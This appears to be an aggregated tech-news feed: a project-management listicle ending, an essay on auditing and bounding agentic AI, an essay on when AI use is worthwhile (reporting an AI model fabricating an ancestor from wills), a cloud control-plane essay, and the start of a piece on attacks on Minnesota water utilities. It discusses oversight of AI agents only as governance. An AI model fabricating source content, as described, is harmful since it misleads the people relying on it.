<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/varunbijlani/">Varun Bijlani</a>, global managing partner for solutions and delivery at IBM Consulting, says the best project managers can confidently and consistently make good calls even in the face of ambiguity.</p>



<p class="wp-block-paragraph">“IT projects are rife with it, even though everyone walks in expecting full clarity and specificity: requirements shift, priorities compete, expectations are unclear, unplanned technical issues arise,” he says. “AI can surface options and synthesize information fast, but it can’t apply the contextual judgment, reasoning, and organizational awareness needed to weigh trade-offs and commit to a direction when the path isn’t clear. That’s still a human call.”</p>



<h2 class="wp-block-heading">15. They communicate effectively</h2>



<p class="wp-block-paragraph">Considering communication plays a significant role in <a href="https://www.cio.com/article/196244/stakeholder-management-your-plan-for-influencing-project-outcomes.html">managing projects, teams, and other stakeholders</a>, it is one of the essential skills for effective project managers, according to longtime project managers.</p>



<p class="wp-block-paragraph">Communication doesn’t just mean being a stellar facilitator, speaker, or writer; it requires good listening skills, too. As such, top managers actively listen to what’s said — and not said — and can take context into account.</p>



<p class="wp-block-paragraph">These skills enable project managers to synthesize information and then clearly and concisely sharing that information back with all those involved, Pincot explains.</p>



<p class="wp-block-paragraph">“They have to be able to translate business needs to technology teams and explain how technology creates value for the business so that everyone can understand and trust that information,” she adds.</p>



<h2 class="wp-block-heading">16. They build community</h2>



<p class="wp-block-paragraph">“I believe the ‘P’ in PM is for the people: You can’t do a project without a team. And the team might not report to the project manager, so you have to have collaborative leadership, problem-solving, and communication skills to activate your team. Without that you can’t really move the needle,” Eidem says. “But in a project, you’re working with people who might have different priorities and different understanding of the goals of the project, so it’s the project manager’s responsibility to make sure everyone is aligned and knows where they’re going.”</p>



<p class="wp-block-paragraph">Butcher agrees, saying that the best project managers know how to build a sense of community among the teams as well as with the workers on the periphery of projects so that everyone is willing to work toward a shared objective.</p>



<h2 class="wp-block-heading">17. They build rapport</h2>



<p class="wp-block-paragraph">Top project managers are also skilled at developing strong rapport with those around them — even for short-lived projects — knowing that good connections and solid relationships lead to success.</p>



<p class="wp-block-paragraph">“When you build rapport, there’s a shared understanding,” Phillips says. That shared understanding pays dividends. Project managers who take time to build up relationships are more likely to have others share information that could impact their projects, and they’re more likely to get help from others if they make difficult requests — such as staying late or coming in on a weekend to catch up.</p>



<h2 class="wp-block-heading">18. They’re confident leaders</h2>



<p class="wp-block-paragraph">According to Wu, effective project managers must possess confidence.</p>



<p class="wp-block-paragraph">“They have a can-do attitude, and that attitude needs to be a bit infectious,” he says. “They don’t have the be cheerleaders, but they do have to have a mindset that sees what’s possible and not just the issues and what’s at risk.”</p>



<p class="wp-block-paragraph">That allows them to present an optimistic attitude that can propel teams forward even during difficult stretches, Butcher adds. Project managers who possess such confidence are those with a track record of success and are competent in foundational project management skills such as planning and team-building, she says.</p>



<h2 class="wp-block-heading">19. They serve as change agents</h2>



<p class="wp-block-paragraph">Change is inevitable and can be highly disruptive to all areas of business and personal life; project management is no exception. Highly effective project managers understand this, embrace it, and build elements of uncertainty into their project plans. They also recognize the need to work closely with change management experts to help stakeholders adapt to change and better prepare for the future state of things.</p>



<h2 class="wp-block-heading">20. They possess an even-keeled demeanor</h2>



<p class="wp-block-paragraph">Even well-planned projects run into problems, and even highly skilled project managers can hit significant setbacks. But the best project managers don’t display panic, anger, or despair even under pressure; they keep their cool.</p>



<p class="wp-block-paragraph">“Projects can create a lot of pressure, and there can be seemingly conflicting priorities, so staying calm is an essential trait for project managers,” Pincot says.</p>



<p class="wp-block-paragraph"><strong>More on project management:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/244577/top-project-management-methodologies.html">Top 20 project management methodologies</a></li>



<li><a href="https://www.cio.com/article/228109/project-management-tips-strategies-best-practices.html">Project management guide: Tips, strategies, best practices</a></li>



<li><a href="https://www.cio.com/article/230682/what-is-a-project-manager-the-lead-role-for-project-success.html">What is a project manager? The lead role for project success</a></li>



<li><a href="https://www.cio.com/article/230398/top-project-management-certifications.html">Top 15 project management certifications</a></li>



<li><a href="https://www.cio.com/article/286354/project-management-7-must-have-project-management-skills-for-it-pros.html">7 must-have project management skills</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI assurance gap: CIOs need proof that agentic AI controls actually work]]></title>
<description><![CDATA[Enterprises have spent decades learning how to audit people and software. Agentic AI creates a third category: systems that interpret instructions, call tools and act across workflows without a mature assurance model built around them.



In my work as a leader and investor across technology-enab...]]></description>
<link>https://tsecurity.de/de/3702707/it-nachrichten/the-ai-assurance-gap-cios-need-proof-that-agentic-ai-controls-actually-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702707/it-nachrichten/the-ai-assurance-gap-cios-need-proof-that-agentic-ai-controls-actually-work/</guid>
<pubDate>Tue, 04 Aug 2026 11:23:04 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Enterprises have spent decades learning how to audit people and software. Agentic AI creates a third category: systems that interpret instructions, call tools and act across workflows without a mature assurance model built around them.</p>



<p class="wp-block-paragraph">In my work as a leader and investor across technology-enabled businesses, I have spent years around automation, cybersecurity, compliance, workflow design and board reporting. I have watched management teams gain confidence from dashboards, policies and approval records, then face a harder question when a board member, auditor or regulator asks whether the controls performed as intended.</p>



<p class="wp-block-paragraph">Agentic AI complicates that question because a single outcome may pass through several systems. An agent can collect information, choose a tool, produce code, route a request and hand work to another agent before a person approves the result. No single manager may have observed the full path.</p>



<p class="wp-block-paragraph">Executive accountability remains human even when the operating activity becomes more autonomous. The CIO may have to explain who authorized the activity, whether the agent stayed within its approved purpose and what evidence supports management’s answer.</p>



<p class="wp-block-paragraph">In a recent<a href="https://x.com/demishassabis/status/2076957440109625718"> </a><a href="https://x.com/demishassabis/status/2076957440109625718">framework for frontier AI</a>, Google DeepMind CEO Demis Hassabis proposed an independent standards body that could evaluate advanced models before deployment and address critical vulnerabilities after release. His proposal focuses on frontier models, but the principle carries into the enterprise: expanding autonomy creates a corresponding need for independent assessment.</p>



<p class="wp-block-paragraph">My rule for this stage of adoption is straightforward: no agent should gain more autonomy than the company can verify.</p>



<h2 class="wp-block-heading"><a></a>The enterprise audit model was built for people and software</h2>



<p class="wp-block-paragraph">Companies have spent decades building controls around people. Employees have job descriptions, reporting lines, approval limits and access rights. When someone leaves, an established process removes access and transfers responsibility.</p>



<p class="wp-block-paragraph">Traditional software also fits a familiar structure. A program follows defined instructions inside systems with owners, release procedures, test records and change controls. Complexity can make review difficult, but the accountability chain is usually visible.</p>



<p class="wp-block-paragraph">An AI agent sits between those categories. It operates through software while interpreting instructions with room to choose a path. Its behavior may change when the model, prompt, connected data, available tools or surrounding workflow changes. A control approved during deployment can weaken months later without an obvious change to the application.</p>



<p class="wp-block-paragraph">Standards are still developing as adoption accelerates. In February 2026, NIST launched an ⁠<a href="https://www.nist.gov/artificial-intelligence/ai-agent-standards-initiative">AI Agent Standards Initiative</a> focused on secure operation and interoperability for agents capable of autonomous action.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/scaling-integration.png?w=1024" alt="Graph: Gartner outlook: Scaling integration against delivery failure risks." class="wp-image-4204558" width="1024" height="520" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Par Chadh</p></div>



<p class="wp-block-paragraph">Gartner predicted that 40% of enterprise applications would include task-specific agents by the end of 2026, up from less than 5% in 2025. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">More than 40% of agentic AI projects could be canceled by the end of 2027</a> because of escalating cost, unclear business value or inadequate risk controls.</p>



<p class="wp-block-paragraph">IBM’s 2025 Cost of a Data Breach research found that ⁠<a href="https://newsroom.ibm.com/2025-07-30-ibm-report-13-of-organizations-reported-breaches-of-ai-models-or-applications%2C-97-of-which-reported-lacking-proper-ai-access-controls">13% of surveyed organizations reported breaches involving AI models or applications</a>. Among that group, 97% reported inadequate AI access controls. 63% of organizations in their study lacked governance policies for managing AI or preventing shadow AI.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/vulnerability-vector.png?w=1024" alt="Vulnerability vector: AI security controls under pressuer." class="wp-image-4204557" width="1024" height="579" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Par Chadh</p></div>



<p class="wp-block-paragraph">One team may approve an agent, another may connect it to data and a third may own the workflow. Management still carries responsibility when the agent exposes information, produces an error or acts outside its approved purpose.</p>



<p class="wp-block-paragraph">Two-thirds of CIOs and CTOs surveyed were being held ⁠<a href="https://www.cio.com/article/4182288/cios-are-being-held-accountable-for-ai-they-dont-fully-control-ibm-study-finds.html">accountable for AI systems they did not fully control</a>. Seventy percent said technology was spreading across the business faster than IT could track it, while 77% said adoption was outpacing governance capabilities.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/cio-autonomy-gap.png?w=1024" alt="The CIO autonomy gap: Sentiment grid." class="wp-image-4204556" width="1024" height="504" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Par Chadh</p></div>



<p class="wp-block-paragraph">The survey findings expose the boardroom gap: management carries accountability while control remains distributed across teams, systems and workflows. An assurance model must provide more than a statement of intent.</p>



<h2 class="wp-block-heading"><a></a>Assurance must prove where the boundary held</h2>



<p class="wp-block-paragraph">Policies, dashboards and logs help establish control. Assurance begins when the company tests whether an agent stayed inside the conditions management approved.</p>



<p class="wp-block-paragraph">Before deployment, management should document the agent’s business purpose, accountable owner, systems touched, allowed actions and stop conditions. Testing should then determine whether the agent can reach information outside its scope, call an unapproved tool, continue after a stop condition or carry an incorrect assumption into another system.</p>



<p class="wp-block-paragraph">I would treat an agent’s autonomy as a renewable license because its operating condition will change after launch. Renewal should follow any material change to the model, connected data, available tools, workflow or authority. NIST’s work on the<a href="https://www.nist.gov/news-events/news/2026/03/new-report-challenges-monitoring-deployed-ai-systems?utm_source=chatgpt.com"> </a><a href="https://www.nist.gov/news-events/news/2026/03/new-report-challenges-monitoring-deployed-ai-systems?utm_source=chatgpt.com">challenges of monitoring deployed AI systems</a> identifies drift, fragmented logging and immature standards as barriers to post-deployment oversight, while the World Economic Forum recommends<a href="https://www.weforum.org/publications/ai-agents-in-action-foundations-for-evaluation-and-governance/?utm_source=chatgpt.com"> </a><a href="https://www.weforum.org/publications/ai-agents-in-action-foundations-for-evaluation-and-governance/?utm_source=chatgpt.com">scaling safeguards with an agent’s autonomy, authority and complexity</a>. A change-triggered review ties assurance to the version of the agent and workflow in use, giving the CIO a defensible basis for continued authority.</p>



<p class="wp-block-paragraph">Consider a coding agent that begins by drafting test cases, then gains access to repositories, tickets, CI/CD tools and production documentation. A production change could involve an instruction, code, a tool call, an automated test, a ticket update and human approval. Assurance must show how the result was produced, which systems participated, whether the agent crossed a boundary and how exceptions were handled.</p>



<p class="wp-block-paragraph">For every agent with meaningful operating authority, I would expect four connected records: the approved baseline, boundary-test results, a history of behavioral drift and an account of exceptions and interventions. Together, they give management a record that can support a board discussion, audit or regulatory response without depending on the technical team’s memory.</p>



<h2 class="wp-block-heading"><a></a>Autonomy should scale only as fast as assurance</h2>



<p class="wp-block-paragraph">Internal teams will remain responsible for designing controls and operating the environment. At board-level scale, management also needs review independent from the people who built and run the agent.</p>



<p class="wp-block-paragraph">I have seen management ask auditors or other independent certified professionals to sign off on a system. They cannot sign when they have not completed the work required to support that opinion. Leadership wants confidence, the board wants an answer and the independent party needs a body of evidence that can be tested.</p>



<p class="wp-block-paragraph">Agentic AI will make that evidence harder to assemble after an incident. Records have to be produced while the work occurs. Once an agent has acted across several systems, reconstruction may depend on logs created by different vendors, teams and tools. Missing context can turn a clear technical event into an uncertain management explanation.</p>



<p class="wp-block-paragraph">CIOs should design assurance into the workflow. The operating record needs to capture approved purpose, tested boundaries, material changes, exceptions, human interventions and unresolved findings. Independent review can then examine whether the control operated during the period management is being asked to discuss.</p>



<p class="wp-block-paragraph">The operating record gives executives a basis for changing an agent’s authority. Broader responsibility should follow tested boundaries and a clean exception history. Drift or repeated intervention should pause expansion until the cause is understood.</p>



<p class="wp-block-paragraph">Before approving broader use, I would ask:</p>



<ul class="wp-block-list">
<li>What authority has the company granted?</li>



<li>Which tests show the boundary holds?</li>



<li>What record will remain available months later?</li>



<li>Who carries accountability when the record shows a failure?</li>
</ul>



<p class="wp-block-paragraph">Those questions create a management standard for deciding whether an agent is ready to move from a limited workflow into broader enterprise operations.</p>



<p class="wp-block-paragraph">Enterprises have spent decades learning how to audit people and software. Agentic AI creates a third category that requires its own assurance model. The next discipline for the enterprise is auditing autonomy through approved behavior, tested boundaries, monitored change and documented intervention.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[When you should use AI, and when you shouldn’t]]></title>
<description><![CDATA[Most folks seem happy to let AI write their LinkedIn posts for them. Others, myself included, have AI draft their work memos or slide decks. And some, according to recent survey data highlighted by AI Secret, are happy to let AI do their grocery shopping for them (28%), but not handle luxury good...]]></description>
<link>https://tsecurity.de/de/3702690/ai-nachrichten/when-you-should-use-ai-and-when-you-shouldnt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702690/ai-nachrichten/when-you-should-use-ai-and-when-you-shouldnt/</guid>
<pubDate>Tue, 04 Aug 2026 11:15:24 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Most folks seem happy to let AI write their LinkedIn posts for them. Others, myself included, have AI draft their work memos or slide decks. And some, according to <a href="https://aisecret.us/deepmind-fired-its-nobel-team/">recent survey data highlighted by AI Secret</a>, are happy to let AI do their grocery shopping for them (28%), but not handle luxury goods or banking (6%). In trying to uncover a guiding principle for when mere mortals are willing to cede control to robots, AI Secret’s authors offered a cutting interpretation of our willingness to buy food but not financial products through AI: “That ranking isn’t trust, it’s a map of what people have stopped caring about.”</p>



<p class="wp-block-paragraph">While this feels true-ish, the “ish” is important. For example, based on the garbage we regularly wade through on LinkedIn, AI slop feels like an attempt to care about something we’re told we <em>should</em> care about, but don’t. If we did, we’d take the time to write it. Or maybe it’s simply an acknowledgment that many people don’t have the skill to write well, so they entrust AI to do it better than they could. (It doesn’t.)</p>



<p class="wp-block-paragraph">Maybe it’s both. As for the willingness to shop for groceries, it’s not that we don’t care about the milk in our fridge—we clearly do—but perhaps we don’t care about <em>how</em> it gets there. We care about the outcome, in other words, but not the process.</p>



<p class="wp-block-paragraph">That feels like the right way to think about AI, and maybe, just maybe, it offers a clue as to when and how you and I should use AI.</p>



<h2 class="wp-block-heading"><a></a>LinkedIn discovers slop</h2>



<p class="wp-block-paragraph">Last week, <a href="https://www.linkedin.com/posts/hsrinivasan1_ai-slop-is-a-top-priority-for-all-of-us-share-7488612006321889282-Ps8Z/">LinkedIn introduced a button that lets users flag a post as “seems like AI slop.”</a> It also pulled its own “enhance your post” feature, which contributed to the AI slop deluge by using AI to help compose posts, and replaced it with a proofreader designed not to change the author’s voice.</p>



<p class="wp-block-paragraph">It’s a welcome change. I’ve been happily “seems like AI slopping” ever since.</p>



<p class="wp-block-paragraph">Still, you have to ask, why are people producing these posts in the first place? My guess is that many don’t value posting but feel obliged to do it because “thought leadership” and “career.” Or maybe, as I did this past week, they used AI to ask, “What are my top-performing posts over the past 10 years and what’s the best strategy for replicating that success?” In addition to telling me to post three times a week (LinkedIn’s algorithms like that), it also told me something I already knew: “Your best posts were personal and opinionated.” In other words, exactly the sort of thing that AI can’t write for me.</p>



<p class="wp-block-paragraph">Yes, AI can produce 500 words on how coaching your daughter’s soccer team taught you seven lessons about enterprise procurement. (“Let that sink in.”) The post will be polished and may even be popular. It will also sound like everything else in others’ feeds because you and every other person outsourced the one thing readers want most: a personal point of view. Something that makes us human.</p>



<p class="wp-block-paragraph">This doesn’t make all AI-assisted writing bad. Far from it. AI can help a non-native English speaker express an original idea or turn dictated thoughts into a coherent draft. It can also challenge an argument, find missing evidence, or suggest a better structure. I use it for all those things.</p>



<p class="wp-block-paragraph">But if you have nothing to say, AI isn’t going to give you a voice. Not a real one.</p>



<h2 class="wp-block-heading">Just because you can… </h2>



<p class="wp-block-paragraph">A couple of years ago, a friend who ran product marketing at a very large technology company told me he was going to start generating sales collateral with AI. First-call decks, email templates, etc. His logic was sound and, honestly, kind of brutal. The collateral his team produced by hand was pulling a few dozen downloads from a sales force numbering in the thousands. If almost nobody wanted it, why pay a junior product marketer to make it? Let the machine publish into the void.</p>



<p class="wp-block-paragraph">Sure, I said. That seems smart. Except it wasn’t. He hadn’t solved the foundational issue.</p>



<p class="wp-block-paragraph">I didn’t know what that issue was, but then neither did he. After all, those low download numbers could suggest any number of things. Maybe the sellers couldn’t find it. Maybe the material wasn’t useful at scale, but perhaps a few dozen people used it to close enormous deals. Perhaps it was simply the wrong collateral for a pressing need, which the sellers resolved on their own. Or maybe, just maybe, that thing that every product marketing team does… doesn’t need to be done.</p>



<p class="wp-block-paragraph">AI makes it easier not to wrestle with the problem. The deck costs almost nothing, so we keep making the deck, rather than addressing whether it needs to be created at all. Similarly, because the weekly report takes only minutes, we opt to keep publishing it. The knowledge base fills with pages no one reads because stopping a process requires a decision. Automating it merely requires a prompt.</p>



<p class="wp-block-paragraph">We’re letting AI kick the can down the road for us, rather than making the hard, human decisions we’re ostensibly paid to make.</p>



<p class="wp-block-paragraph">I’ve made a version of this argument about software. <a href="https://www.infoworld.com/article/4181971/making-sense-of-too-much-code.html?utm=hybrid_search">App creation is way up, but app adoption isn’t</a>. Building was never the only constraint. Getting anyone to care is the constraint, and AI doesn’t solve that. It just removes our last excuse for not noticing.</p>



<h2 class="wp-block-heading"><a></a>Two kinds of low-value work</h2>



<p class="wp-block-paragraph">This isn’t a case against automating boring things. We should totally do that, and immediately. But “low-value work” hides two very different things, and they deserve opposite treatment.</p>



<p class="wp-block-paragraph">The first is a low-value process attached to a valuable outcome, like my milk example. Take expense reports, backups, etc. These aren’t exciting things to do, but they <em>must</em> get done. AI gives us the chance to hand off as much of the process as we safely can, check the result, and move on.</p>



<p class="wp-block-paragraph">The second is a low-value process attached to no discernible outcome, like the sales collateral or a LinkedIn post with no personality or real point of view. Automating this feels like a win because the cost drops, but cost is not the core problem. The real problem is that the output has no audience. It doesn’t need to exist.</p>



<p class="wp-block-paragraph">If you can’t name a useful outcome that would be lost if the output stopped existing, you don’t have an automation opportunity. You have a cancellation opportunity.</p>



<h2 class="wp-block-heading"><a></a>I use AI where I care most</h2>



<p class="wp-block-paragraph">Now for the part that complicates my own argument, because the inverse is also true. The work where I use AI most aggressively is often the work I care about <em>most</em>.</p>



<p class="wp-block-paragraph">I wrote last week about <a href="https://www.infoworld.com/article/4201445/will-open-weights-make-ai-more-honest.html">asking Claude to read four 18th-century probate wills</a> as part of a 20-year hunt for the parents of a fourth-great-grandfather. It fabricated an entire emigrant ancestor. It was clean, plausible, and completely invented. I only caught it by clicking through to the high-resolution images and reading the documents myself, line by line.</p>



<p class="wp-block-paragraph">I’ve been thinking about that experience differently this week. The model excused its behavior as “hopeful reading.” OK. But the reason I caught it is duller and more important than anything about the model: I caught Claude’s error because I cared. Twenty years of caring made me open the originals. It really, really, <em>really </em>mattered to me that it be right.</p>



<p class="wp-block-paragraph">Nobody wants to proofread the deck they never wanted to make in the first place.</p>



<p class="wp-block-paragraph">The same pattern holds at work. I use AI constantly for executive memos, compressing a sprawling pile of data and argument into context, recommendation, and ask. This is high-stakes work with a real reader, a real decision, and my name on it. So I read every line. I challenge the output. I edit (a lot). The AI doesn’t replace my investment in the work, but it does do 90% of the early legwork for me so that I can focus on the critically important last 10%.</p>



<p class="wp-block-paragraph">I’ve called this <a href="https://www.infoworld.com/article/4111829/ais-trust-tax-for-developers.html">AI’s trust tax</a>: You pay the verification cost up-front, or someone else pays it later when the answer causes damage. The tax gets paid most reliably when somebody cares about the outcome. When nobody cares, AI can make bad work look finished enough to ship and presentable enough to glance at without reviewing carefully.</p>



<p class="wp-block-paragraph">AI slop, then, really isn’t a model problem; it’s a question of caring, which manifests in how we choose to use it.</p>



<h2 class="wp-block-heading"><a></a>Maybe just stop</h2>



<p class="wp-block-paragraph">I wish I had a clear, guiding principle to offer here, but I don’t. Here are two questions that help, though.</p>



<ol class="wp-block-list">
<li>What useful outcome disappears if this work stops?</li>



<li>If that outcome matters, where is human judgment still needed?</li>
</ol>



<p class="wp-block-paragraph">If there’s no meaningful outcome, stop doing the work, whether AI-powered or human-powered. If the outcome matters but much of the process doesn’t, hand the process to AI. Let AI buy the groceries, search the archive, assemble the first draft, or build the sales deck that sellers have said they actually need. Then keep a person accountable for the result.</p>



<p class="wp-block-paragraph">AI is extremely good at making more things. We don’t need more things, and making them cheaper won’t make them useful. Humans, by contrast, are extremely good (or need to be) at determining which things need to be made. That’s your job, and mine, and no prompt can take it away from us.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[When the cloud control plane fails]]></title>
<description><![CDATA[Not long ago, I worked with an enterprise that believed it had done everything right. The company had spread workloads across multiple regions, replicated key data stores, documented failover procedures, and invested heavily in automation. On paper, it looked like a mature cloud deployment. Then ...]]></description>
<link>https://tsecurity.de/de/3702689/ai-nachrichten/when-the-cloud-control-plane-fails/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702689/ai-nachrichten/when-the-cloud-control-plane-fails/</guid>
<pubDate>Tue, 04 Aug 2026 11:15:19 +0200</pubDate>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Not long ago, I worked with an enterprise that believed it had done everything right. The company had spread workloads across multiple regions, replicated key data stores, documented failover procedures, and invested heavily in automation. On paper, it looked like a mature cloud deployment. Then a control-plane issue hit one of its core providers. The infrastructure itself was not entirely gone, but the management layer became unstable enough that teams could not make timely changes, trigger the recovery actions they expected, or trust the environment’s state in real time. What failed was not simply compute or storage. What failed was the company’s assumption that the cloud’s control mechanisms would always be there.</p>



<p class="wp-block-paragraph">That experience gets to the heart of a growing problem. Cloud reliability is under renewed scrutiny because more outages are now being tied to control-plane failures rather than isolated infrastructure faults. An <a href="https://www.infoworld.com/article/4181964/the-causes-of-cloud-outages-are-changing.html" data-type="link" data-id="https://www.infoworld.com/article/4181964/the-causes-of-cloud-outages-are-changing.html">Uptime Institute report</a> recently highlighted that shift, and it should get the attention of every serious architect. When the management layer becomes the problem, the blast radius can be much broader than most organizations anticipate.</p>



<p class="wp-block-paragraph">For years, the industry has talked about resilience primarily in terms of infrastructure. We focus on zones, regions, backups, and service redundancy. Those things still matter, of course. However, they do not tell the whole story anymore. The cloud is not just a collection of servers, storage systems, and networks. It is also a massive operating model built around APIs, orchestration layers, identity systems, policy engines, service controllers, and automation frameworks. When that higher-order control structure breaks or becomes impaired, your recovery plans can unravel very quickly.</p>



<h2 class="wp-block-heading">Another architecture problem</h2>



<p class="wp-block-paragraph">To begin with, architects need to accept that the control plane is no longer some invisible layer they can safely assume will remain stable under all conditions. It is now part of the architecture problem because it is part of the failure domain. If your workloads, scaling logic, network policies, failover actions, service permissions, and operational decisions all depend on that layer functioning normally, then a control-plane failure can compromise much more than a single application or regional deployment.</p>



<p class="wp-block-paragraph">I have seen many organizations convince themselves they are resilient simply because they have redundancy in place. That is not enough. Redundancy below the control plane does not fully protect you from a failure above it. You may have healthy infrastructure underneath and still find yourself unable to make the necessary adjustments to keep critical systems operating correctly. That is the architectural blind spot, and it is becoming more obvious as these incidents gain visibility.</p>



<h2 class="wp-block-heading">Multiregion design is not enough</h2>



<p class="wp-block-paragraph">One of the most common reactions is that multiregion architecture is the answer. It is part of the answer, but it is not the complete answer. If both regions remain dependent on the same provider control mechanisms, the same identity systems, or the same operational APIs, then you still have a shared dependency that can become a common point of failure.</p>



<p class="wp-block-paragraph">This is where architects need to become much more precise. Geographic separation is useful, but it is not the same thing as operational independence. A design that survives a local infrastructure problem may not survive a management-layer disruption. A design that can replicate data between regions may still fail if the orchestration required to redirect traffic or re-establish service health depends on the same impaired control systems.</p>



<p class="wp-block-paragraph">I keep pushing architects to think beyond the usual checklist. Do not just ask whether your workloads are distributed. Ask whether your recovery assumptions remain valid when the provider’s management plane is unstable. That is a harder question and, in many cases, the answer is uncomfortable.</p>



<h2 class="wp-block-heading">Assume degraded control</h2>



<p class="wp-block-paragraph">Most failover plans are written as though the environment will remain manageable during a crisis. They assume the dashboards will be available, the APIs will function, the automation scripts will still execute, and the service states will stay reliable enough to support rapid decisions. Those are fine assumptions during normal operations. They are dangerous during a control-plane event.</p>



<p class="wp-block-paragraph">I have worked with teams that had detailed <a href="https://www.networkworld.com/article/967679/what-is-disaster-recovery-how-to-ensure-business-continuity.html">disaster recovery plans</a> that looked excellent in review meetings and failed under real pressure because too much of the recovery logic still depended on the platform that was affected. This is more common than many organizations want to admit. They mistake documentation for resilience. They mistake automation for independence. They mistake configuration complexity for architectural maturity.</p>



<p class="wp-block-paragraph">If you want a realistic failover strategy, you need to plan for degraded control. That means pre-positioned recovery paths, simpler decision trees, fewer dependencies on real-time reconfiguration, and clearer operational boundaries. It also means testing for scenarios where you cannot rely on the provider management layer the way you normally do. Until you test that, you do not really know your recovery capability.</p>



<h2 class="wp-block-heading">Should you go multicloud?</h2>



<p class="wp-block-paragraph">I am not arguing that every organization should rush into multicloud. In many cases, that would add cost and complexity without delivering enough value. However, I am arguing that dependence on a single provider’s management layer should now be treated as a strategic risk, not just an implementation detail.</p>



<p class="wp-block-paragraph">If your observability, policy enforcement, deployment controls, identity dependencies, and recovery workflows are all deeply tied to one provider’s management model, then you need to understand the implications clearly. You may have concentrated far more risk than you realize. This does not always require abandoning the provider. Often it means designing with more independence, more external visibility, and more realistic assumptions about what can fail.</p>



<p class="wp-block-paragraph">Architects have spent years optimizing for speed, convenience, and service richness. Now we need to rebalance around control, resilience, and recovery realism. That is not a step backward. It is a sign that cloud architecture is finally maturing.</p>



<h2 class="wp-block-heading">Resilience above the platform</h2>



<p class="wp-block-paragraph">The old belief was that once you deployed correctly inside a major cloud, the platform would absorb most of the complexity for you. In many ways, that is still true. The large providers deliver incredible engineering and operational discipline. But that does not remove the need to design for shared dependencies that sit above the infrastructure layer.</p>



<p class="wp-block-paragraph">Control-plane failures remind us that cloud reliability is no longer just about where workloads run. What coordinates them? What manages them? What are your options when that coordination layer becomes unreliable? This topic matters so much right now because it forces architects to rethink resilience.</p>



<p class="wp-block-paragraph">If there is one takeaway here, it is this: Stop assuming your management layer is always outside the scope of failure planning. It is not. It is central to it. Once you understand that, your approach to multiregion design, failover planning, and provider dependency starts to change in the right ways.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Minnesota attackers may hold a better backup of your plant than you do]]></title>
<description><![CDATA[More than 30 Minnesota community water systems were hit by coordinated cyber activity against their operational technology on July 26 and 27; several lost remote control or deliberately cut it while operators contained the intrusion. The reporting since — including CSO’s own news analysis — has r...]]></description>
<link>https://tsecurity.de/de/3702657/it-security-nachrichten/the-minnesota-attackers-may-hold-a-better-backup-of-your-plant-than-you-do/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702657/it-security-nachrichten/the-minnesota-attackers-may-hold-a-better-backup-of-your-plant-than-you-do/</guid>
<pubDate>Tue, 04 Aug 2026 11:08:41 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">More than 30 Minnesota community water systems were hit by coordinated cyber activity against their operational technology on July 26 and 27; several lost remote control or deliberately cut it while operators contained the intrusion. The reporting since — including <a href="https://www.csoonline.com/article/4203638/a-coordinated-attack-hit-30-minnesota-water-systems-who-did-it-and-what-does-a-rockwell-notice-add-to-the-picture.html">CSO’s own news analysis</a> — has rightly chased two open questions: Who did it, and whether a shared weakness in Rockwell Automation MicroLogix 1400 controllers tied dozens of small utilities together. Both questions matter. Neither changes what operators must do this week. Attribution is the investigators’ problem. Exposure is yours — and the advisories published since July 30 contain considerably more actionable detail than most coverage has extracted from them.</p>



<h2 class="wp-block-heading">Key takeaways</h2>



<ul class="wp-block-list">
<li><strong>Assume the attackers have your control logic. </strong>CISA’s advisory AA26-097A documents exfiltration of PLC project files. Rockwell’s recovery notice for locked-out MicroLogix 1400s requires a current offline project file to restore operations — an artifact many small utilities cannot produce. Where both are true, the adversary may hold the only current copy of the plant’s logic.</li>



<li><strong>You cannot Shodan your own cellular exposure. </strong>Researchers found little internet-facing Minnesota water infrastructure precisely because these utilities connect over cellular. The same opacity blinds defenders’ self-assessments. Enumerate SIM-equipped OT devices from carrier invoices, not from network scans.</li>



